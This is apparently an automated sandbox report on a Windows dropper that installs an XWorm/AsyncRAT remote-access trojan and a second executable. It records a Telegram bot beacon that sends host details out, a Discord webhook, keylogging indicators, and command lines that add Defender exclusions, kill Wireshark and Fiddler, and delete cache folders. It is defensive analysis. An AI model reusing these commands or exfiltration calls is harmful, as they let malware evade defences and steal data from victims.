Source: global traffic	HTTP traffic detected: GET /botYour_Token/sendMessage?chat_id=Your_ID&text=%E2%98%A0%20%5BXWorm%20V5.4%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AA31E5670B8AC1D800C46%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20MT6421D5%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.4 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View	ASN Name: TUT-ASUS TUT-ASUS
Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: ASN-DCS-01US ASN-DCS-01US

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: ip-api.com

Source: unknown	TCP traffic detected without corresponding DNS query: 185.84.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 185.84.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 185.84.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 185.84.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 185.84.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 185.84.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 185.84.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 185.84.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 185.84.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 185.84.160.88
Source: unknown	TCP traffic detected without corresponding DNS query: 185.84.160.88
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /botYour_Token/sendMessage?chat_id=Your_ID&text=%E2%98%A0%20%5BXWorm%20V5.4%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AA31E5670B8AC1D800C46%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20MT6421D5%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.4 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 13 Oct 2024 19:36:06 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: powershell.exe, 0000001B.00000002.2228163895.00000160B1150000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: powershell.exe, 00000005.00000002.1616353785.00000292E942E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000005.00000002.1616353785.00000292E942E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 00000015.00000002.1764008193.00000224DB9EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microso
Source: SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe, 00000000.00000002.1456183358.0000000005171000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000004.00000000.1452452305.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp, XClient.exe, 00000004.00000002.2695394174.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000005.00000002.1600083870.00000292E0DD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1739994356.00000224D3260000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1912834311.000002D79006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2177220564.00000160A897B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001B.00000002.2002206285.0000016098B39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.1546142734.00000292D0F88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1655442225.00000224C3419000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1800705832.000002D78022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2002206285.0000016098B39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: XClient.exe, 00000004.00000002.2695394174.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1546142734.00000292D0D61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1655442225.00000224C31F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1800705832.000002D780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2002206285.0000016098911000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1546142734.00000292D0F88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1655442225.00000224C3419000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1800705832.000002D78022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2002206285.0000016098B39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000001B.00000002.2002206285.0000016098B39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000017.00000002.1947850955.000002D7EF6B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000005.00000002.1546142734.00000292D0D61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1655442225.00000224C31F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1800705832.000002D780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2002206285.0000016098911000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe, 00000000.00000002.1456183358.0000000005171000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000004.00000000.1452452305.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp, XClient.exe, 00000004.00000002.2695394174.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: XClient.exe, 00000004.00000002.2695394174.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/botYour_Token/sendMessage?chat_id=Your_ID&text=%E2%98%A0%20%5BXWorm%20V5.4%
Source: powershell.exe, 0000001B.00000002.2177220564.00000160A897B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001B.00000002.2177220564.00000160A897B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001B.00000002.2177220564.00000160A897B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: MAXLEVLZ.exe, 00000002.00000002.1532288272.00007FF624E1D000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: MAXLEVLZ.exe, 00000002.00000003.1523156504.0000025B01229000.00000004.00000020.00020000.00000000.sdmp, MAXLEVLZ.exe, 00000002.00000002.1531526105.0000006B039FA000.00000004.00000010.00020000.00000000.sdmp, MAXLEVLZ.exe, 00000002.00000002.1531917882.0000025B01229000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com/api/webhooks/1203640095937396768/Pl0ypjLLEfnaAvtcyJBNXsF_i3Hfi6Vh7raCnywH_hvJ
Source: powershell.exe, 0000001B.00000002.2002206285.0000016098B39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: MAXLEVLZ.exe, 00000002.00000002.1531826029.0000025B011AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://keyauth.win/api/1.2/
Source: MAXLEVLZ.exe, 00000002.00000002.1531826029.0000025B011AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://keyauth.win/api/1.2/Up
Source: MAXLEVLZ.exe, 00000002.00000003.1523156504.0000025B01229000.00000004.00000020.00020000.00000000.sdmp, MAXLEVLZ.exe, 00000002.00000002.1531526105.0000006B039FA000.00000004.00000010.00020000.00000000.sdmp, MAXLEVLZ.exe, 00000002.00000002.1531917882.0000025B01229000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://media.discordapp.net/attachments/986004472633360426/1024410917171105862/7D43EBF8-2791-4557-8
Source: MAXLEVLZ.exe, 00000002.00000002.1531826029.0000025B011C5000.00000004.00000020.00020000.00000000.sdmp, MAXLEVLZ.exe, 00000002.00000002.1531526105.0000006B039FA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://myexternalip.com/raw
Source: MAXLEVLZ.exe, 00000002.00000002.1531526105.0000006B039FA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://myexternalip.com/rawhttps://media.discordapp.net/attachments/986004472633360426/102441091717
Source: powershell.exe, 00000005.00000002.1600083870.00000292E0DD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1739994356.00000224D3260000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1912834311.000002D79006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2177220564.00000160A897B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49708 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: XClient.exe.0.dr, XLogger.cs	.Net Code: KeyboardLayout
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.5198fe8.1.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.518dda8.2.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout

Source: C:\Users\user\AppData\Roaming\XClient.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\AppData\Roaming\XClient.exe

Process information set: 01 00 00 00

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.518dda8.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.5198fe8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.0.XClient.exe.bc0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.5198fe8.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.518dda8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000004.00000000.1452452305.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1456183358.0000000005171000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

PE file contains section with special chars

Source: MAXLEVLZ.exe.0.dr	Static PE information: section name: .#8>
Source: MAXLEVLZ.exe.0.dr	Static PE information: section name: .?OG

Source: C:\Users\user\AppData\Roaming\XClient.exe	Code function: 4_2_00007FF7BFEDA440	4_2_00007FF7BFEDA440
Source: C:\Users\user\AppData\Roaming\XClient.exe	Code function: 4_2_00007FF7BFED5C06	4_2_00007FF7BFED5C06
Source: C:\Users\user\AppData\Roaming\XClient.exe	Code function: 4_2_00007FF7BFED1329	4_2_00007FF7BFED1329
Source: C:\Users\user\AppData\Roaming\XClient.exe	Code function: 4_2_00007FF7BFED1ED1	4_2_00007FF7BFED1ED1
Source: C:\Users\user\AppData\Roaming\XClient.exe	Code function: 4_2_00007FF7BFED69B2	4_2_00007FF7BFED69B2
Source: C:\Users\user\AppData\Roaming\XClient.exe	Code function: 4_2_00007FF7BFED1C45	4_2_00007FF7BFED1C45
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF7BFEC21FA	5_2_00007FF7BFEC21FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FF7BFEE20FD	21_2_00007FF7BFEE20FD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FF7BFEE13DD	21_2_00007FF7BFEE13DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FF7BFEE1BBD	21_2_00007FF7BFEE1BBD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FF7BFEE1B25	21_2_00007FF7BFEE1B25
Source: C:\Users\user\AppData\Roaming\XClient.exe	Code function: 29_2_00007FF7BFEB1329	29_2_00007FF7BFEB1329
Source: C:\Users\user\AppData\Roaming\XClient.exe	Code function: 29_2_00007FF7BFEB1C45	29_2_00007FF7BFEB1C45
Source: C:\Users\user\AppData\Roaming\XClient.exe	Code function: 30_2_00007FF7BFEF1329	30_2_00007FF7BFEF1329
Source: C:\Users\user\AppData\Roaming\XClient.exe	Code function: 30_2_00007FF7BFEF1C45	30_2_00007FF7BFEF1C45

Source: SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe, 00000000.00000000.1427002940.0000000002DC8000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameDevilamxlevle.exe4 vs SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe
Source: SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe, 00000000.00000002.1456183358.0000000005171000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient.exe4 vs SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe

Source: SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.518dda8.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.5198fe8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.0.XClient.exe.bc0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.5198fe8.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.518dda8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000004.00000000.1452452305.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1456183358.0000000005171000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: XClient.exe.0.dr, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: XClient.exe.0.dr, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: XClient.exe.0.dr, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.5198fe8.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.5198fe8.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.5198fe8.1.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.518dda8.2.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.518dda8.2.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.518dda8.2.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: XClient.exe.0.dr, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: XClient.exe.0.dr, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.518dda8.2.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.518dda8.2.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.5198fe8.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.5198fe8.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@42/29@2/3

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe

File created: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7964:120:WilError_03
Source: C:\Users\user\AppData\Roaming\XClient.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\XClient.exe	Mutant created: \Sessions\1\BaseNamedObjects\UVVppe7tX5UgJ4bb
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8144:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Mutant created: \Sessions\1\BaseNamedObjects\8QRmbKRmtfmpeBYsN
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6176:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7816:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3228:120:WilError_03

Source: C:\Users\user\AppData\Roaming\XClient.exe

File created: C:\Users\user\AppData\Local\Temp\Log.tmp

Jump to behavior

Source: SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebuggerSvc.exe")

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe

ReversingLabs: Detection: 57%

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Process created: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe "C:\Users\user\AppData\Roaming\MAXLEVLZ.exe"
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Process created: C:\Users\user\AppData\Roaming\XClient.exe "C:\Users\user\AppData\Roaming\XClient.exe"
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c taskkill /FI "IMAGENAME eq fiddler" /IM /F /T >nul 2>&1
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c taskkill /FI "IMAGENAME eq wireshark" /IM /F /T >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler" /IM /F /T
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq wireshark" /IM /F /T
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerPro
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM HTTPDebuggerSvc.exe /F
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\XClient.exe "C:\Users\user\AppData\Roaming\XClient.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\XClient.exe "C:\Users\user\AppData\Roaming\XClient.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Process created: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe "C:\Users\user\AppData\Roaming\MAXLEVLZ.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Process created: C:\Users\user\AppData\Roaming\XClient.exe "C:\Users\user\AppData\Roaming\XClient.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c taskkill /FI "IMAGENAME eq fiddler" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c taskkill /FI "IMAGENAME eq wireshark" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&1	Jump to behavior
